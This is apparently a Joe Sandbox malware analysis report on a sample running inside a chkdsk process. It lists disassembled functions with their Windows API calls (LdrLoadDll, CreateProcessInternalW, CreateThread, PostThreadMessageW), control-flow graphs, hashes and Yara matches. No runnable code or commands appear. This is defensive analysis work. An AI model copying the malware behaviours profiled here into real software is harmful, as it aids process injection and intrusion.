                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bd26814e8820f406288e5b0d96cff57e32617d77d47b6f2719c0d68d151f6d12
                                                      • Instruction ID: ce8a51e02419a2b43512bfc94cac4adb13997552c5af4f8d0f52cd5a12ee5755
                                                      • Opcode Fuzzy Hash: bd26814e8820f406288e5b0d96cff57e32617d77d47b6f2719c0d68d151f6d12
                                                      • Instruction Fuzzy Hash: A590027124108806F510619D840474A001697D4345F55C411A4415668D86D5D8D17161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 821622566480ca3d376dab22b126f0fc4207d8a058513c8b7f17b8f6c33807e1
                                                      • Instruction ID: 3b518ebcd7eaff1c80b9b5393d749716c40467b60eada92a230fe79f47e1cd21
                                                      • Opcode Fuzzy Hash: 821622566480ca3d376dab22b126f0fc4207d8a058513c8b7f17b8f6c33807e1
                                                      • Instruction Fuzzy Hash: C890027124504846F540719D4404A46002697D4349F51C011A00556A4D9665DD95B6A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 855cdbbe61aed3266defe5e3096ab5abb0966f38c410472433efc563adb2e1ba
                                                      • Instruction ID: c27206a886fe7452d8f17498a9870e81e687f2ca12f4f9b4acc3c8ac8f66840c
                                                      • Opcode Fuzzy Hash: 855cdbbe61aed3266defe5e3096ab5abb0966f38c410472433efc563adb2e1ba
                                                      • Instruction Fuzzy Hash: D790027124100806F580719D440464A001697D5345F91C015A0016664DCA55DA9977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 27c2ff423447fca76aaa7f5340b963e6ff676b839880eb7b66bbd2d825e0302c
                                                      • Instruction ID: 06e8d1ee69851390b022f753424ceedeea5937c66021afb94db883384ba6c8e0
                                                      • Opcode Fuzzy Hash: 27c2ff423447fca76aaa7f5340b963e6ff676b839880eb7b66bbd2d825e0302c
                                                      • Instruction Fuzzy Hash: B190027135114406F510619D8404706001697D5245F51C411A0815568D86D5D8D17162
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 73d697499a8cc8959e112ec4e4d4bf95bb08ddbdb16986db60606c956f203054
                                                      • Instruction ID: 79f8916288bdf9f7100a3a4a5e1b425d0f54ced0e09dcff444c6fe1add4e30c7
                                                      • Opcode Fuzzy Hash: 73d697499a8cc8959e112ec4e4d4bf95bb08ddbdb16986db60606c956f203054
                                                      • Instruction Fuzzy Hash: BB90026925300006F580719D540860A001697D5246F91D415A0006568CC955D8A96361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8401e58902cceaefbaac57aa08a55e7232495d5c08e1483f0a6381da90b98c95
                                                      • Instruction ID: 3d5a79c6da216192819566169a0731eea4bc4037af8410d8a0146b03cb1a4027
                                                      • Opcode Fuzzy Hash: 8401e58902cceaefbaac57aa08a55e7232495d5c08e1483f0a6381da90b98c95
                                                      • Instruction Fuzzy Hash: F890027124100406F50065DD5408646001697E4345F51D011A5015565EC6A5D8D17171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d19747d50ee363dd74c549ea44d0b2ac888f505ad47d22ceaeaad69f386da6b1
                                                      • Instruction ID: 1803757d0e66a41d04b2ab738def62341160e20d2f65409e36426ab95eaa6f6a
                                                      • Opcode Fuzzy Hash: d19747d50ee363dd74c549ea44d0b2ac888f505ad47d22ceaeaad69f386da6b1
                                                      • Instruction Fuzzy Hash: 7F900261282041567945B19D44045074017A7E4285B91C012A1405960C8566E896E661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1604c3b526b467299772ad800cf75b7537a049ea86aaaf0d8dc096ef1471e340
                                                      • Instruction ID: 49651fed67d1eab28aa967d22ed4f91f9afa02886ec9c8256002513aaaa9af57
                                                      • Opcode Fuzzy Hash: 1604c3b526b467299772ad800cf75b7537a049ea86aaaf0d8dc096ef1471e340
                                                      • Instruction Fuzzy Hash: BB90027124100417F511619D4504707001A97D4285F91C412A0415568D9696D992B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 598219b248dce314512aacdf33eee88fa00d70f53d4b4b33365560fc9c24ee13
                                                      • Instruction ID: acd7dbe5d81f1b632df47637984c60f63cf156f674cb709d45275bf1d0e7b79b
                                                      • Opcode Fuzzy Hash: 598219b248dce314512aacdf33eee88fa00d70f53d4b4b33365560fc9c24ee13
                                                      • Instruction Fuzzy Hash: 759002A138100446F500619D4414B060016D7E5345F51C015E1055564D8659DC927166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6926edbd1410c2f6bd09aaba668ded2dda828ebebb41312ff641c5b3849af42c
                                                      • Instruction ID: ae5b27acf9a8063b0bb74b7b570e4ded84b9dc69a0554aa4af99bd1d8ba8d320
                                                      • Opcode Fuzzy Hash: 6926edbd1410c2f6bd09aaba668ded2dda828ebebb41312ff641c5b3849af42c
                                                      • Instruction Fuzzy Hash: 289002B124100406F540719D4404746001697D4345F51C011A5055564E8699DDD576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f0be23fa9f8deb070116005f2e380052cf2cac18f6e180b4a6beedf5506540f6
                                                      • Instruction ID: 90987e8036c4fb0fa9d031960ed373b1fc388ca342a6da28bc165ee297c6675e
                                                      • Opcode Fuzzy Hash: f0be23fa9f8deb070116005f2e380052cf2cac18f6e180b4a6beedf5506540f6
                                                      • Instruction Fuzzy Hash: 0690026125180046F60065AD4C14B07001697D4347F51C115A0145564CC955D8A16561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA7300 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 221 4aa7300-4aa732f 222 4aa733b-4aa7342 221->222 223 4aa7336 call 4aaa020 221->223 224 4aa7348-4aa7398 call 4aaa0f0 call 4a99b40 call 4aa3e50 222->224 225 4aa741c-4aa7422 222->225 223->222 232 4aa73a0-4aa73b1 Sleep 224->232 233 4aa73b3-4aa73b9 232->233 234 4aa7416-4aa741a 232->234 235 4aa73bb-4aa73e1 call 4aa6f30 233->235 236 4aa73e3-4aa7403 233->236 234->225 234->232 237 4aa7409-4aa740c 235->237 236->237 238 4aa7404 call 4aa7130 236->238 237->234 238->237
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 04AA73A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: dfcd0beef329a6d91f179bf78e4fbef89336285b6136ea5f255df5743792d63b
                                                      • Instruction ID: b1b6f14a28f1ab1cd0d89e9fb1fde5426483886ba44b768bf0159eff15da7585
                                                      • Opcode Fuzzy Hash: dfcd0beef329a6d91f179bf78e4fbef89336285b6136ea5f255df5743792d63b
                                                      • Instruction Fuzzy Hash: 253170B6602700ABD715EF68C8A0FABB7F8AF88704F04852DFA595B241D730F555CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA72F6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 241 4aa72f6-4aa7342 call 4aaa020 245 4aa7348-4aa7398 call 4aaa0f0 call 4a99b40 call 4aa3e50 241->245 246 4aa741c-4aa7422 241->246 253 4aa73a0-4aa73b1 Sleep 245->253 254 4aa73b3-4aa73b9 253->254 255 4aa7416-4aa741a 253->255 256 4aa73bb-4aa73e1 call 4aa6f30 254->256 257 4aa73e3-4aa7403 254->257 255->246 255->253 258 4aa7409-4aa740c 256->258 257->258 259 4aa7404 call 4aa7130 257->259 258->255 259->258
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 04AA73A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      • Opcode ID: 304ebb4a01e5e1b3f792feb5afae3431580a8f8fc9bf642133a6ead3fdd11844
                                                      • Instruction ID: 00e98d121e0440db7cf097f40742e48ae57bb17c4ba84e65e3de6a2a5d6d786d
                                                      • Opcode Fuzzy Hash: 304ebb4a01e5e1b3f792feb5afae3431580a8f8fc9bf642133a6ead3fdd11844
                                                      • Instruction Fuzzy Hash: BC31BFB6601700ABD711DF64C8A0FABB7F8AF88704F04812DFA295B241E775F556CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA88E8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 268 4aa88e8-4aa88ef 270 4aa88f1-4aa8907 call 4aa91e0 268->270 271 4aa8946-4aa895c call 4aa91e0 268->271 274 4aa890c-4aa8921 RtlFreeHeap 270->274
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04A93B93), ref: 04AA891D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 2fef7744b3f794cfed9e953800a30649d81d15b4c3c15a5fcb1b89bf5f5997d6
                                                      • Instruction ID: 4423ca8337818540b18a9de1a02f05ae8b46ff23c39aee8a27b6255e56fa28be
                                                      • Opcode Fuzzy Hash: 2fef7744b3f794cfed9e953800a30649d81d15b4c3c15a5fcb1b89bf5f5997d6
                                                      • Instruction Fuzzy Hash: C2F090B5204604ABDB14EFA8DC88DA777ACEF84260F008949F95D9B241C630EA24C7F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA88F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 277 4aa88f0-4aa8906 278 4aa890c-4aa8921 RtlFreeHeap 277->278 279 4aa8907 call 4aa91e0 277->279 279->278
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04A93B93), ref: 04AA891D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction ID: ac70d71d71c08b955b4eac09cb49872cfed3f2f6e48be02e8a03c03b8888074e
                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                      • Instruction Fuzzy Hash: DBE046B1200208ABDB18EF99CC48EA777ACEF88750F018558FE085B241C630F910CAF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A97305 Relevance: 3.2, APIs: 2, Instructions: 192threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04A972DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04A972FB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: dfb0c9938bf7794bd551d84ef68ee2598880c1ba43ae3997d4c9ec21dd612ec9
                                                      • Instruction ID: c2fa46bdc835e7ae902933d2023745f692734f77c646e96405550ec4aae36f50
                                                      • Opcode Fuzzy Hash: dfb0c9938bf7794bd551d84ef68ee2598880c1ba43ae3997d4c9ec21dd612ec9
                                                      • Instruction Fuzzy Hash: 84617FB5900209AFEB24DF64CD85FEBB7E8AB48704F10446DE94997280DB74BE41CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A97280 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04A972DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04A972FB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                      • Instruction ID: 3beabd24e98c50442eb13c597391bdedc6241f1d740bad87609ab155272e9033
                                                      • Opcode Fuzzy Hash: f3663199beabf3b2e139a43e338370e3a84a0ac6ed7f57403b6f9c19571d6667
                                                      • Instruction Fuzzy Hash: 0501DF71A9022977FB20AA949D02FBE77AC5B00B54F040018FF04BE1C0EA947D0686F5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A97303 Relevance: 3.0, APIs: 2, Instructions: 25threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 355 4a97303 357 4a972dc-4a972de 355->357 358 4a972d0-4a972da PostThreadMessageW 355->358 359 4a972fd-4a97302 357->359 360 4a972e0-4a972fb call 4a992a0 PostThreadMessageW 357->360 358->357 360->359
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04A972DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04A972FB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 6f3dc74b6e209b631eb56767c025d2bad9b37c20e2d646a975f194e62a1b9f7a
                                                      • Instruction ID: 92d84f9688d475c61804edee7b3a85d3e42ed7011653aeaa4fd96652837e55cb
                                                      • Opcode Fuzzy Hash: 6f3dc74b6e209b631eb56767c025d2bad9b37c20e2d646a975f194e62a1b9f7a
                                                      • Instruction Fuzzy Hash: E6E012657A021975FE2855546C43FBA36D89741F01F50006AFB08EC1C1E9C5280556F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04A99B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 559 4a99b40-4a99b5c 560 4a99b64-4a99b69 559->560 561 4a99b5f call 4aaaf70 559->561 562 4a99b6b-4a99b6e 560->562 563 4a99b6f-4a99b7d call 4aab390 560->563 561->560 566 4a99b8d-4a99b9e call 4aa9720 563->566 567 4a99b7f-4a99b8a call 4aab610 563->567 572 4a99ba0-4a99bb4 LdrLoadDll 566->572 573 4a99bb7-4a99bba 566->573 567->566 572->573
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 04A99BB2
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction ID: 03d5a0da4e9d22a7c6b1394dbe244fdc42761eb871cae5bb0a747d052757fe6c
                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction Fuzzy Hash: 7B011EB5D4020DBBDF10EBE4DD41F9EB3BC9B54208F004195AA0897284F635FB14CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA8960 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04AA89B4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: c112a8183be8491a7f7732a336aa359547483cbe839d3fbe082553c5d207ea19
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: D101AFB2214108ABCB54DF89DC84EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA895D Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 574 4aa895d-4aa8979 575 4aa897f-4aa89b8 CreateProcessInternalW 574->575 576 4aa897a call 4aa91e0 574->576 576->575
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04AA89B4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: ce62f3000f2bbce27a0ee820e4df8732edcd9c7a874b525a1be2e38594308c11
                                                      • Instruction ID: c698b937fcf534d4bbaa636079a0aed8822a1d92cd0a56fb3df78d78d5469be3
                                                      • Opcode Fuzzy Hash: ce62f3000f2bbce27a0ee820e4df8732edcd9c7a874b525a1be2e38594308c11
                                                      • Instruction Fuzzy Hash: 4701B2B2200108BFCB54DF89DD84EEB37AEAF8C754F158248FA0DA7244C630E951CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04AA7430 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04A9CCF0,?,?), ref: 04AA746C
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
                                                      • Instruction ID: 14577ca8ea0a1bd948795b59759492d2b4fc5fabe525123ae7c49df1fb3d449f
